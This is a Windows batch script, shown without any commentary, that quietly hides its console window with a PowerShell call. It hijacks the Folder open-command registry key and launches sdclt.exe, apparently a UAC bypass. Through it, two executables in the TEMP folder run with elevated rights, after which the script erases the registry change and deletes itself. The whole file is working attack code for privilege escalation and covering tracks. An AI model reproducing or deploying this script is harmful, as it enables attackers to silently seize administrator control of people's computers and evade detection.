@echo off
powershell -Command "Add-Type -TypeDefinition 'using System;using System.Runtime.InteropServices;public class Win32{[DllImport(\"user32.dll\")]public static extern bool ShowWindow(IntPtr hWnd,int nCmdShow);}'; [Win32]::ShowWindow((Get-Process -Id $pid).MainWindowHandle, 2)"
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c start /b \"\" \"%TEMP%\1.exe\" && start /b \"\" \"%TEMP%\2.exe\" && timeout /t 2 /nobreak >nul && reg delete \"HKCU\Software\Classes\Folder\shell\open\command\" /f && del /f /q \"%~f0\"" /f
reg add "HKCU\Software\Classes\Folder\shell\open\command" /v "DelegateExecute" /f
start "" "%windir%\system32\sdclt.exe"
exit
